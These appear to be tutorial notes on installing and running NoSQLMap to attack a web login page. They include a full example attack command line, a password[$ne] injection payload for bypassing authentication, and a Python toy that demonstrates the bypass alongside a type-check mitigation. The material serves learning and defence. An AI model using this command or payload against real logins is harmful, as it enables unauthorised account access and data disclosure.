some notes

NoSQLMap

NoSQLMap is an open-source Python tool for auditing NoSQL databases and the web applications that use them. It automates injection attacks and exploits default configuration weaknesses in order to disclose data from the database.

This is an old tool, so it is better to install it in a virtual environment.

git clone https://github.com/codingo/NoSQLMap.git
virtualenv --python=python2 /home/student/nosqlmap-env
source /home/student/nosqlmap-env/bin/activate
pip install certifi==2018.10.15
cd NoSQLMap
python setup.py install

To run, use the nosqlmap.py command.

An example of how NoSQLMap could be used to attack a login page follows. The <target-host>, <target-email> and <random-password> values should be changed.
nosqlmap.py --attack 2 --victim <target-host> --webPort 80 --uri /login --httpMethod POST --postData email,<target-email>,password,<random-password> --injectedParameter 1 --injectSize 4 --injectFormat 2 --savePath output.log

| Argument | Description |
| --- | --- |
| --attack 2 | Use the NoSQL Web APP attacks |
| --victim target.lan | The target host is target.lan |
| --webPort 80 | The target webserver is listening on port 80 |
| --uri /login | The web path to attack |
| --httpMethod POST | Use POST requests |
| --postData email,test@test.test,password,qwerty | Use this CSV data for POST request |
| --injectedParameter 1 | Inject into the first parameter (as listed by NoSQLMap) |
| --injectSize 4 | The injected random string values should be 4 characters long |
| --injectFormat 2 | For injected strings, use the “letters only” format |
| --savePath output.log | Save all findings to a file called output.log |

From the list of exploitable requests you can see that instead of a request containing the password field, NoSQLMap suggests using password[$ne].
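
Why a `password[$ne]` field changes the query, and the input check that stops it, as an added Python example that is not from NoSQLMap or these notes. The functions `parse_extended`, `toy_match`, `login_vulnerable` and `login_hardened` are hypothetical, the matcher is a toy that models only equality and `$ne`, and the user record and request bodies are constructed.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample data; plaintext password only to keep the toy short.
USER = {"email": "user@example.test", "password": "constructed-secret"}
BODY_NORMAL = "email=user%40example.test&password=wrong"
BODY_OPERATOR = "email=user%40example.test&password[$ne]=wrong"

def parse_extended(body):
    """Expand one level of bracket keys, a[b]=c -> {"a": {"b": "c"}},
    modelling what an extended form parser hands to the application."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if m:
            nested = out.get(m.group(1))
            if not isinstance(nested, dict):
                nested = out[m.group(1)] = {}
            nested[m.group(2)] = value
        else:
            out[key] = value
    return out

def toy_match(stored, query):
    """Stand-in for a document store's matcher: equality and $ne only."""
    for field, cond in query.items():
        if isinstance(cond, dict):
            if set(cond) != {"$ne"}:
                raise ValueError("operator not modelled in this toy")
            if stored.get(field) == cond["$ne"]:
                return False
        elif stored.get(field) != cond:
            return False
    return True

def login_vulnerable(stored, form):
    # Parsed values go straight into the query, so a dict becomes an operator.
    return toy_match(stored, {"email": form.get("email"),
                              "password": form.get("password")})

def login_hardened(stored, form):
    # Only plain strings may reach the query; operator objects are refused.
    email, password = form.get("email"), form.get("password")
    if not isinstance(email, str) or not isinstance(password, str):
        return False
    return toy_match(stored, {"email": email, "password": password})
```

The type check in `login_hardened` is the mitigation: a request whose `password` arrives as an object instead of a string is rejected before any query is built.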